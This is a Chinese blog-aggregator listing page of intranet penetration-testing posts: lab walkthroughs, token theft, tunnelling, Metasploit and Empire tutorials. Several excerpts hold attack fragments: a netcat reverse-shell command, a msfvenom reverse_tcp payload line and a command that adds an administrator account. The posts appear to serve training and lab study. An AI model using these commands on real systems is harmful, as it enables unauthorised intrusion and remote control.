【内网渗透】第6页

记一次内网渗透测试实训总结

原文连接前言时间很快就来到了学期的最后一个月，和上学期一样，最后的几周是实训周，而这次实训恰好就是我比较喜欢的网络攻防，因为之前学过相关的知识，做过一些靶场，相比于其他同学做起来要快些，不过内网渗透也还是头一次

faaany·2023-07-25 20:36

【网络安全】DVWA靶场实战&BurpSuite内网渗透

BurpSuite内网渗透一、攻击模式介绍1.1Sniper（狙击手）1.2Batteringram（攻城锤）1.3Pitchfork（草叉）1.4Clusterbomb（榴霰弹）二、DVWA靶场搭建2.1

九芒星#·2023-07-25 18:20

【推荐】阿里云主机accesskey利用工具

APP中也会泄露这些信息.通过这款利用工具我们可以进行命令执行获取到shell然后进行内网渗透。

安全大哥·2023-07-21 03:20

[内网渗透]—令牌窃取

令牌简介令牌（Token）是指系统中的临时秘钥，相当于账户和密码，有了令牌就可以在不知道密码的情况下访问目标相关资源了，这些令牌将持续存在于系统中，除非系统重新启动分类授权令牌（Delegationtoken）：交互式会话登陆（例：本地用户登陆、用户桌面等）模拟令牌（Impersonationtoken）：非交互式登陆（例：netuse访问共享文件）两种token只在系统重启后清除具有Delega

Sentiment.·2023-07-17 07:10

内网渗透_令牌窃取

内网渗透_令牌窃取0x01.令牌简介令牌（Token）是指系统中的临时秘钥，相当于账户和密码，有了令牌就可以在不知道密码的情况下访问目标相关资源了，这些令牌将持续存在于系统中，除非系统重新启动0x02.

Beyond My·2023-07-17 07:38

内网渗透之Token令牌窃取

文章目录前言一、Token的作用二、令牌的种类三、AccessToken的窃取与利用1.incognito.exe程序2.MSF下的incognito模块3.MSF方式令牌窃取靶机演示前言本文包括：令牌的基本概念和种类，以及在windows靶场环境下访问令牌的窃取利用，靶场为ATT&CK红队评估实战靶场(二)的DC靶机。一、Token的作用1）令牌(token)是系统的临时秘钥，相当于账号和密码，

Mauro_K·2023-07-17 07:38

靶场练习--春秋云境-Tsclient

简介：Tsclient是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点

NooEmotion·2023-07-16 17:50

内网渗透DC-5靶场通关

个人博客地址:点我DC系列共9个靶场，本次来试玩一下一个DC-5，只有一个flag，下载地址。下载下来后是.ova格式，建议使用vitualbox进行搭建，vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式，桥接模式可能会造成目标过多不易识别。IPDC-5:192.168.31.107Kali:192.168.31.18Win7:192.168.31.168信息搜集首先是主机发现，得到

xzajyjs·2023-07-16 03:02

Billu_b0x2内网渗透(多种提权方法)靶场-vulnhub

个人博客阅读体验更佳本次来试玩一下vulnhub上的Billu_b0x2，下载地址。下载下来后是.ova格式，建议使用vitualbox进行搭建，vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式，桥接模式可能会造成目标过多不易识别。IPwin7:192.168.31.44kali:192.168.31.17靶机:192.168.31.132信息搜集主机发现得到靶机ip，接着进行端口扫

xzajyjs·2023-07-16 03:31

红队打靶，红日系列，红日靶场2

文章目录描述：环境搭建:外网渗透：漏洞利用冰蝎连接，拿到shell内网渗透转站CSCS插件提权域渗透与横向移动描述：红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习

青衫木马牛·2023-07-14 07:56

红队打靶，红日靶场系列，红日靶场4

文章目录环境搭建：外网渗透：Struts2phpmyadmintomcat内网渗透msf上线建立代理内网信息收集密码获取总结环境搭建：攻击机：真实机win10kali：192.168.0.128靶机：web

青衫木马牛·2023-07-14 07:56

网络安全（黑客）内网渗透基础知识

0x01内网概述内网也指局域网（LocalAreaNetwork，LAN）是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。内网是封闭型的，它可以由办公室内的两台计算机组成，也可以由一个公司内的上千台计算机组成。列如银行、学校、企业工厂、政府机关、网吧、单位办公网等都属于此类。0x

没更新就是没更新·2023-07-13 21:37

2023网络安全常见面试题汇总（附答案解析+配套资料）

小V讲安全·2023-07-13 21:32

应急响应-Linux

博客主页：不知名白帽的博客_CSDN博客-网络安全,CTF,内网渗透领域博主网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan目录关键目录常用命令日志分析关键目录文件名说明

不知名白帽·2023-06-23 21:45

内网渗透(八十八)之委派攻击

委派委派是大型网络中经常部署的应用模式，给多跳认证带来了很大的便利与此同时也带来了很大的安全隐患。利用委派，攻击者可结合其他漏洞进行组合攻击，导致攻击者可获取本地管理员权限甚至域管理员权限，还可以制作深度隐藏的后门。委派是指将域内用户的权限委派给服务账户，使得服务账户能以用户权限访问域内的其他服务。委派的流程图如图所示，域内用户A以Kerberos身份验证访问Web服务器请求下载文件，但是真正的文

千负·2023-06-23 20:24

课程汇报 kerberoasting攻击学习

一、基础(6条消息)内网渗透-获取WIN本地用户Hash_windows账号hash在哪_XG小刚的博客-CSDN博客渗透基础——活动目录信息的获取(qq.com)渗透基础——域内用户口令策略的获取(qq.com

叙..·2023-06-23 10:46

内网渗透-常用反弹shell方法总结

常用反弹shell方法总结文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell:nc-e/bin/bash1.1.1.199992.如果linux中nc没有-e参数3.nc弹windows下的shell:whois反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell前言bash反弹shell

炫彩@之星·2023-06-22 19:03

渗透测试基础

常用于内网渗透拖库“脱裤”：入侵成功且进入数据库后，将数据库全部下载下来。一句话木马：通过向服务器提交一段简短的代码，配合

丘丘用户思思澪·2023-06-22 06:59

PHP学习笔记第四天

博客主页：不知名白帽的博客_CSDN博客-网络安全,CTF,内网渗透领域博主网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan目录PHP超级全局变量PHP

不知名白帽·2023-06-22 01:48

渗透测试流程

的区别CSRF和SSRF的区别CSRF和XSS和XXE区别中间件漏洞PHP代码审计容易出问题的点GET和POST的区别Cookie和Session的区别webshell的检测方法反弹shell常用命令内网渗透提权免杀应急响应反

冰峰zoubf·2023-06-21 10:44

内网渗透—隧道搭建&SPP与NPS内网穿透

内网渗透—隧道搭建&SPP与NPS内网穿透1.前言2.SPP2.1.SPP代理通信2.1.1.服务端配置2.1.2.客户端配置2.1.3.CS设置2.1.3.1.设置生成的监听器2.1.3.2.设置监听的监听器

剁椒鱼头没剁椒·2023-06-19 23:30

我的内网渗透-Empire基本操作

简介Empire是一个纯粹的PowerShell开发后代理，基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能，而无需powershell.exe，从关键记录器到Mimikatz的可快速部署的利用后模块，以及适应性强的通信以逃避网络检测，所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次亮相。安装正常情况下apt-get（具有一

偷吃"游"的阿彪·2023-06-19 03:57

我的内网渗透-Empire进阶（会话转移和剪贴板攻击）

目录剪贴版攻击安装运行注意会话迁移剪贴版攻击安装下载网址https://github.com/D4Vinci/PasteJacker下载的两种方式①直接在windows中下载，然后解压完把文件夹传到kali中进行安装②只接在kali中下载gitclonehttps://github.com/D4Vinci/PasteJacker#下载压缩包unzipPasteJacker-master.zip#解

偷吃"游"的阿彪·2023-06-19 03:57

我的内网渗透-linux

目录基础渗透msfvomen木马生成开启监听下载运行木马会话提升信息搜集linux提权suid粘滞位提权普通用户修改不了密码原因利用find进行提权内核提权：脏牛漏洞步骤：sudo提权影响范围漏洞探测无文件连接后门植入第一种第二种第三种linux漏洞库痕迹清除基础渗透msfvomen木马生成msfvenom-ax86-plinux/x86/meterpreter/reverse_tcplhost=

偷吃"游"的阿彪·2023-06-19 03:27

我的内网渗透-Empire模块的使用（宏病毒主要）

目录stager模块（payload）宏病毒理解在word中的设置宏病毒代码运行保存监听模块提权模块持久化模块stager模块（payload）常用的windows类型windows/launcher_bat#生成bat类型，还是可以用的。但是会报木马windows/htawindows/launcher_vbswindows/dllwindows/launcher_xmlMSBuild是一个免费

偷吃"游"的阿彪·2023-06-19 03:26

网络渗透攻击与加固

目录一、内网渗透模拟攻击1.1综合扫描工具1.1.1X-scan1.1.2Zenmap1.2内网渗透模拟流程二、Net命令2.1netuser2.1.1功能2.1.2用法2.2netlocalgroup2.2.1

01==零壹·2023-06-18 21:29

vulnstack(红日)内网渗透靶场二: 免杀360拿下域控

前言在我之前的文章vulnstack(一)打靶，我主要依赖CobaltStrike进行后期渗透测试，这次我计划使用Metasploit框架(MSF)来进行这个阶段的工作。这个靶场与之前的不同之处在于它的WEB服务器安装了360安全卫士。虽然这增加了挑战的难度，但只要我们能够成功地进行免杀处理，就可以顺利进行渗透靶场考察知识1.weblogic漏洞OracleWebLogic是一个基于JavaEE的

Henry404s·2023-06-17 07:27

ARP协议

我们经常听到的这些术语，包括"网络扫描"、"内网渗透"、"中间人拦截"、"局域网流控"、"流量欺骗"，基本都跟ARP脱不了干系。

lingshengxiyou·2023-06-15 22:58

内网渗透—Linux上线

内网渗透—Linux上线1.前言2.下载插件3.CS配置3.1.客户端配置3.1.1.导入插件文件3.1.2.配置监听3.2.服务端配置3.2.1.导入配置文件3.3.生成木马3.3.1.修改cna文件

剁椒鱼头没剁椒·2023-06-14 17:57

内网渗透—隧道搭建&Ngrok与Frp内网穿透

这里写目录标题1.前言1.1.隧道技术介绍1.2.代理技术介绍1.2.1.正向代理1.2.2.反向代理1.2.3.透明代理1.2.4.正向代理与透明代理区别2.内网穿透2.1.Ngrok2.1.1.访问Ngrok2.1.2.代理设置2.1.2.1.开通代理2.1.2.2.配置隧道2.1.2.3.下载客户端2.1.3.配置客户端2.1.3.1.添加执行权2.1.3.2.隧道连接2.1.4.生成木马2

剁椒鱼头没剁椒·2023-06-14 17:27

内网渗透(四)之基础知识-搭建域环境

系列文章内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点注：阅读本编文章前，请先阅读系列文章，以免造成看不懂的情况！！

千负·2023-06-14 17:06

2022最新网络安全岗面试题汇总（附答案解析）

我不是hack·2023-06-13 19:18

我的内网渗透-提权大法

拿到shell之后乱码解决chcp65001#将编码设置为UTF-8的编码出现这个提示就是切换成功，后面也是可以正常显示的提权方法一：新版本的kali直接getsystem，可以提权成功（有时候可以，有时候不可以）meterpreter>getsystem提权成功方法二：利用uac（用户账户控制）进行提权。用户账户控制在涉及管理员权限的时候会提示你是否要这么做，确定的话就是以管理员的身份去运行；如

偷吃"游"的阿彪·2023-06-13 11:57

我的内网渗透-metasploit基础

目录MSFpostgresqlmsf模块永恒之蓝木马下放后渗透一些简单命令MSFMsfconsole是Metasploit框架的主要控制台界面。开源的渗透软件postgresql使用的是postgresql数据库（metasploit所依载的数据库，没有他也可以运行metasploit框架）作用：通过数据库可以记录相关的被msf模块收集渗透过的信息systemctlstartpostgresql#

偷吃"游"的阿彪·2023-06-13 11:56

内网渗透-windows远程用户管理

文章目录0x01获取window权限（管理员）0x02添加用户，并且到管理员组0x03开启远程桌面0x04添加到远程桌面组0x05进行远程0x06免责声明0x01获取window权限（管理员）使用cs上线用户kali:192.168.253.234windowserver2019:192.168.253.2430x02添加用户，并且到管理员组netuserunamepass/add添加用户名为na

星球守护者·2023-06-13 01:26

lcx端口转发linux_技术干货 | 内网渗透之代理转发

1前言谈到内网转发，在我们日常的渗透测试过程中经常会用到端口转发，可以利用代理脚本将内网的流量代理到本地进行访问，这样极大的方便了我们对内网进行横向渗透。那为什么不直接通过登陆服务器来对内网中其他机器进行渗透，而是通过内网转发呢？意义何在呢？因为.........大部分时候拿到权限不够，无法直接登录。而且如果在内网服务器中进行操作，我们需要上传工具进行很多操作，如果服务器缺少对应的环境变量或者组件

weixin_39735005·2023-06-12 14:55

利用powershell脚本进行内网渗透

powershell知识点ps1是powershell脚本的拓展名，就相当于cmd的.bat脚本，但是他更加强大。获取版本信息get-host#查看powershell的版本信息$psversiontable#查看powershell的版本信息执行策略PowerShell执行策略是一项安全功能，用于控制PowerShell加载配置文件和运行脚本的条件。此功能有助于防止恶意脚本的执行。关于策略的知识

偷吃"游"的阿彪·2023-06-11 07:59

内网渗透-端口转发隧道技术

文章目录代理和隧道技术区别隧道通信原理常用的隧道技术判断内网协议连通性ICMP协议TCP协议telnetNCHTTP协议curlWgetDNS协议nslookupdigICMP隧道pingtunnel检测连通性DNS隧道开放端口域名修改解析记录配置DNS监听器生成后门上线主机传输层端口转发隧道LcxNetCat正向反弹shell反向反弹shell多向连接反弹shell-配合转发相关netcat主要

Ranwu0·2023-06-10 07:50

frp内网渗透隧道技术

1.服务端-下载-解压-修改-启动（阿里云主机记得修改安全组配置出入口）服务器修改配置文件frps.ini：[common]bind_port=7000启动服务端：./frps-c./frps.ini2.控制端-下载-解压-修改-启动控制端修改配置文件frpc.ini：[common]server_addr=你的云主机ipserver_port=7000#frpc工作端口，必须和上面frps保持

Zhao蔫儿·2023-06-10 07:20

内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线

内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线1.前言1.1.实验背景1.2.环境准备1.2.1.环境介绍1.2.2.环境测试1.2.2.1.攻击机测试1.2.2.2.Windows20081.2.2.3

剁椒鱼头没剁椒·2023-06-10 07:19

内网渗透—代理Socks协议、路由不出网、SMB绕过、CS-MSF控制上线

内网渗透—代理Socks协议、路由不出网、SMB绕过、CS-MSF控制上线1.前言1.1.实验背景1.2.环境准备1.2.1.环境介绍1.2.2.环境测试2.CS上线2.1.Windows2008上线2.2

剁椒鱼头没剁椒·2023-06-10 07:19

【内网渗透】搭建隧道

目录0x001隧道介绍0x002网络传输应用层检测连通性0x003网络层ICMP隧道ptunnel使用0x001隧道介绍什么是隧道？在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对

多学点技术·2023-06-10 07:18

Mauro_K·2023-06-10 07:46

内网渗透之隧道传输技术

搜索公众号：白帽子左一，领配套练手靶场，全套安全课程及工具一、内网-隧道传输网络隧道技术指的是利用一种网络协议来传输另一种网络协议，它主要利用网络隧道协议来实现这种功能。网络隧道技术涉及了三种网络协议，即网络隧道协议、隧道协议下面的承载协议和隧道协议所承载的被承载协议。在安全人员人员的日常工作中，会遇到因为相关配置或设备导致的无法和目标设备通信的状况，这时就可以尝试使用隧道通信解决。防火墙两端的数

zkzq·2023-06-10 07:44

内网渗透—隧道技术

内网渗透—隧道技术1.隧道技术介绍1.1.内网—隧道技术1.2.常见的隧道协议1.3.前置条件1.4.判断内网的连通性2.网络层隧道技术2.1.ICMP隧道技术2.1.1.常见工具2.1.2.Pingtunnel

剁椒鱼头没剁椒·2023-06-10 07:43

内网渗透之隐藏通信隧道

前言在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？隧道就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。隐藏通信隧道隧道隧道技术是一种通过使用互联网

istan1ey·2023-06-10 02:49

内网渗透之隐藏通信隧道技术

一、隐藏通信隧道基础知识1、隐藏通信隧道概述一般的网络通信，先在两台机器之间建立TCP连接，然后进行正常的数据通信。在知道IP地址的情况下，可以直接发送报文；如果不知道IP地址，就需要将域名解析成IP地址。在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至人侵检测系统来检查对外连接的情况，如果发现异常，就会对通信进行阻断。这里的隧道，是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火

璀璨星☆空﹌·2023-06-10 02:47

Windows远程执行进程工具psexec和wmiexec介绍

在网络安全中称为横向移动的内网渗透方法可实现远程执行命令，横向移动工具有很多，本文介绍psexec和wmiexec这两个工具如何实现远程执

测试开发小记·2023-06-09 17:16

内网安全：内网渗透.（拿到内网主机最高权限 vulntarget 靶场 A）

内网安全：内网渗透.（拿到内网主机最高权限）内网穿透又被称为NAT穿透，内网端口映射外网，在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。

半个西瓜.·2023-06-09 09:26

一份网络安全工具合集

信息收集工具（自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具、指纹识别工具、端口扫描工具、各种插件....etc...）漏洞利用工具（各大CMS利用工具、中间件利用工具等项目........）内网渗透工具

初阶羊·2023-06-09 04:40

推荐频道

【内网渗透】